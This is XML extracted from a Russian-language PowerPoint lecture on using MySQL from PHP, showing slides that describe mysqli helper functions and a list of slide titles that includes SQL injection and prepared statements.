                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MYSQLI_NUM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Полезные функции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395288" y="1571625"/>
            <a:ext cx="8748712" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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mysqli_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ( object $result )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Возвращает количество рядов результата запроса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mysqli_num_fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ( object $result )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Возвращает количество полей результата запроса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/>
              <a:t>mysqli_affected_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ( object $link )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
              <a:t>Возвращает число затронутых прошлой операцией рядов</a:t>
            </a:r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mysqli_field_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>( object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>$link )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
              <a:t>Возвращает число затронутых прошлой операцией </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>полей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>mixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli_insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ( object $link )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Возвращает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>сгенерированный при последнем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>INSERT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>запросе</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>( object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>link, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>					string $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>unescaped_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Экранирует специальные символы в строках для использования в выражениях </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL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28921</TotalTime>
  <Words>539</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>225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Модульная</vt:lpstr>
      <vt:lpstr>PHP Уровень 2. Использование сервера баз данных MySQL в приложениях PHP</vt:lpstr>
      <vt:lpstr>Темы модуля</vt:lpstr>
      <vt:lpstr>Алгоритм работы с сервером баз данных MySQL</vt:lpstr>
      <vt:lpstr>Работа с соединением</vt:lpstr>
      <vt:lpstr>Соединение и выбор базы данных</vt:lpstr>
      <vt:lpstr>Создание запроса</vt:lpstr>
      <vt:lpstr>Получение результата запроса</vt:lpstr>
      <vt:lpstr>Способы получения результата</vt:lpstr>
      <vt:lpstr>Полезные функции</vt:lpstr>
      <vt:lpstr>Лабораторная работа – 6</vt:lpstr>
      <vt:lpstr>SQL инъекция</vt:lpstr>
      <vt:lpstr>Внедрение в строковые параметры</vt:lpstr>
      <vt:lpstr>Расщепление SQL-запроса</vt:lpstr>
      <vt:lpstr>Использование UNION</vt:lpstr>
      <vt:lpstr>Экранирование хвоста запроса</vt:lpstr>
      <vt:lpstr>Выполнение команд на сервере</vt:lpstr>
      <vt:lpstr>Поготовленные запросы</vt:lpstr>
      <vt:lpstr>Поготовленные запросы: выборка</vt:lpstr>
      <vt:lpstr>Расширение MySQL</vt:lpstr>
      <vt:lpstr>Расширение MySQL: пример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сервера баз данных MySQL в приложениях PHP</dc:title>
  <dc:creator>ioborisov@specialist.ru</dc:creator>
  <cp:keywords>Соединение с сервером баз данных MySQL, Выбор базы данных, Исполнение запроса, Получение результата запроса, Полезные функции, Обзор MySQLi, SQL View, Подготовленные запросы</cp:keywords>
  <cp:lastModifiedBy>Oleg</cp:lastModifiedBy>
  <cp:revision>305</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-06-17T07:49:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-19T02:42:07Z</dcterms:modified>
  <cp:category>PHP, веб, интернет</cp:category>
</cp:coreProperties>
</file>